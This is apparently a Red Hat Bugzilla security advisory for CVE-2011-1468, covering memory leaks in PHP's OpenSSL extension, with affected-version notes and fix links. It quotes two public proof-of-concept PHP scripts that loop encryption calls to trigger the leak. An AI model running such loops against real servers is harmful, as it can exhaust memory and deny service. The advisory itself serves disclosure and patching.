Bug 690899 (CVE-2011-1468)
Summary: | CVE-2011-1468 php: Multiple memory leaks in the OpenSSL extension | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | David Kutálek <dkutalek> |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | unspecified | CC: | dkutalek, fedora, jorton, jrusnack, vdanen |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2011-11-02 23:05:56 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 740731, 740732, 740733, 740734, 831135 | ||
Bug Blocks: | 715030 |
Description
Jan Lieskovsky
2011-03-25 18:21:40 UTC
Public PoC from [2]: ==================== <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?> Public PoC from [3]: ==================== <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ $cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); $dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2'); if ($dcr != $data.$i){ print "at step $i decryption failed\n"; } } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?> This issue did NOT affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5. -- This issue affects the version of the php53 package, as shipped with Red Hat Enterprise Linux 5. This issue affects the version of the php package, as shipped with Red Hat Enterprise Linux 6. -- This issue does NOT affect the versions of the php package, as shipped with Fedora release of 13 and 14 (particular packages update has been already scheduled). The corresponding fix to openssl_decrypt() is: http://svn.php.net/viewvc?view=revision&revision=308534 This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php). |